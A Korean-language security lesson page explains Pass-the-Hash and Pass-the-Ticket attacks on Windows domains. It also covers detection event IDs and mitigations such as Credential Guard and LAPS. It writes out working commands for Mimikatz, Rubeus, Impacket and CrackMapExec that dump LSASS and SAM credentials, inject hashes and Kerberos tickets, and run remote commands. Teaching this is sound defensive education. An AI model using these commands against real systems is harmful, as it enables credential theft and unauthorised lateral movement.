0Pricing
Cyber Security Academy · 강의

Pass-the-Hash와 Pass-the-Ticket 공격

평문 비밀번호를 몰라도 자격 증명 해시와 Kerberos 티켓을 사용해 측면 이동을 수행합니다.

Pass-the-Hash와 Pass-the-Ticket 공격은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 2번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

이러한 공격이 존재하는 이유

Windows 자격 증명 프로토콜은 인증 비밀(NTLM 해시, Kerberos 티켓)을 메모리에 저장합니다. 공격자가 SYSTEM 권한을 가지면 이러한 비밀을 추출하여 암호를 몰라도 다른 사용자로 인증하는 데 재사용할 수 있습니다.

Mimikatz로 NTLM 해시 추출

Mimikatz는 Windows에서 가장 대표적인 자격 증명 추출 도구입니다. SYSTEM 또는 관리자 권한으로 실행하면 LSASS 프로세스 메모리를 읽어 NTLM 해시와 평문 자격 증명을 추출합니다.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Mimikatz를 사용한 패스 더 해시(PtH)

PtH는 평문 암호를 몰라도 NTLM 해시를 새 세션에 주입합니다. 주입된 해시는 NTLM을 사용해 원격 서비스에 인증하며, 다른 Windows 호스트로 측면 이동할 때 효과적입니다.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Impacket을 사용한 패스 더 해시

Impacket은 PtH를 위한 Python 도구를 제공합니다. psexec.py, smbexec.py, wmiexec.py는 NTLM 해시를 직접 받아 원격 명령을 실행합니다.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Kerberos 티켓 추출

Kerberos 티켓도 LSASS 메모리에 저장됩니다. Mimikatz가 티켓을 추출하며, Rubeus는 Windows에서 Kerberos 티켓 작업을 수행하는 특수 도구입니다.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

패스 더 티켓(PtT)

PtT는 탈취한 Kerberos 티켓을 현재 세션에 주입합니다. 그러면 해당 티켓의 원래 소유자로 서비스에 인증할 수 있으며, 해시나 암호가 필요하지 않습니다.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

원격으로 LSASS 덤프하기

거점을 확보한 후 CrackMapExec 또는 Impacket의 secretsdump를 사용해 원격으로 LSASS를 덤프할 수 있습니다. 대상에서 대화형 세션을 열 필요가 없습니다.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

측면 이동 경로

해시나 티켓을 확보한 후 측면으로 이동할 수 있습니다. 로컬 관리자 자격 증명을 재사용해 다른 컴퓨터로 PtH를 수행하고, 도메인 서비스에 액세스하기 위해 PtT를 수행하며, 권한 있는 계정을 대상으로 삼아 도메인 관리자 권한으로 확장합니다.

PtH와 PtT 탐지

방어자는 다음과 같은 방식으로 PtH를 탐지합니다. 대화형 로그온에 대응하는 기록이 없고 로그온 유형이 3인 Event ID 4624(로그온), NTLM 인증 이상 징후, 메모리나 디스크에서 발견되는 Mimikatz 특징을 확인합니다.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

완화 방법

주요 완화 방법은 다음과 같습니다. Credential Guard를 활성화해 가상화로 LSASS를 보호하고, 컴퓨터 간 로컬 관리자 자격 증명 재사용을 제한하며(LAPS), 권한 있는 계정에 Protected Users 그룹을 적용하고, 가능한 경우 NTLM을 비활성화합니다.

오버패스 더 해시

오버패스 더 해시는 NTLM 해시를 Kerberos TGT로 변환합니다. NTLM은 차단되었지만 Kerberos를 사용할 수 있는 환경이나, 추가 Kerberos 공격을 위해 TGT가 필요한 경우에 유용합니다.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

빠른 확인

가상화를 사용해 LSASS 자격 증명 저장소를 보호하는 Windows 보안 기능은 무엇입니까?

요약: PtH와 PtT

패스 더 해시와 패스 더 티켓은 Active Directory 측면 이동의 핵심입니다. 두 공격 모두 LSASS에 저장된 Windows 자격 증명을 악용합니다. Mimikatz와 Impacket을 사용하면 추출과 재사용을 쉽게 수행할 수 있습니다. Credential Guard, LAPS, Protected Users 그룹을 사용하고 NTLM 및 Kerberos 인증 이벤트를 엄격하게 모니터링하여 방어해야 합니다.

자주 묻는 질문

“Pass-the-Hash와 Pass-the-Ticket 공격” 강의는 무료인가요?

네 — “Pass-the-Hash와 Pass-the-Ticket 공격” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

“Pass-the-Hash와 Pass-the-Ticket 공격”에서 뭘 배우나요?

평문 비밀번호를 몰라도 자격 증명 해시와 Kerberos 티켓을 사용해 측면 이동을 수행합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 2번째 강의입니다.

“Pass-the-Hash와 Pass-the-Ticket 공격” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. Windows 인증: NTLM과 Kerberos
  2. Pass-the-Hash와 Pass-the-Ticket 공격
  3. Kerberoasting과 AS-REP Roasting
  4. Active Directory 보안 강화
← Cyber Security Academy(으)로 돌아가기